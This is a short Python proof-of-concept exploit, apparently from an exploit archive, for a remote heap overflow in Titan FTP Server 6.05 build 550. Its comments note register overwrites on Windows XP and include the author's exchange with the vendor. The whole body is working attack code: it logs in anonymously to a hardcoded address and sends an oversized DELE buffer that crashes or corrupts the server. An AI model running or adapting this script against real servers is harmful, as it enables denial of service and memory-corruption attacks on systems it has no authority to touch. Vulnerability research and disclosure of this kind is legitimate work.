#!/usr/bin/python # # First of all, thanks to my wife Edita. # # Remote Heap overflow in Titan FTP Server version 6.05 build 550 # (DELE ) - probably other commands are vulnerable too # PoC tested on WinXP sp1 # EAX and ESI are overwritten with 41414141 and 44444444 # # Greetz to muts, m1k1, bolexxx # and crew from offsec, remote-exploit.org, Cedes.ba, Itas and Cikom :) # # "Actually, we always release patches to customers first, then to the general public a few days later. # So both the User/Pass issue and your issue are basically invalid as they were already fixed by the time you ran # your tests." # This was the last answer from vendor when i contacted them. They asked me which version i used, i said "the last one, # 6.05 build 550". They said there is patched/fixed release 6.10, then i asked where? Then, they sent me the mail you # see above. # # Coded by Muris Kurgas a.k.a j0rgan < muris [at] cg [dot] yu > import socket s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "\nSaljem zli bafer..." buffer = '\x90' * 20519 + "A" * 4 + "D" * 4 + "B" * 55000 s.connect(('192.168.1.9',21)) data = s.recv(1024) s.send('USER ftp' +'\r\n') data = s.recv(1024) s.send('PASS ftp' +'\r\n') data = s.recv(1024) print "\nBum! Bum! Bum! :)" s.send('DELE ' +buffer+'\r\n') s.close() be safe, j0rgan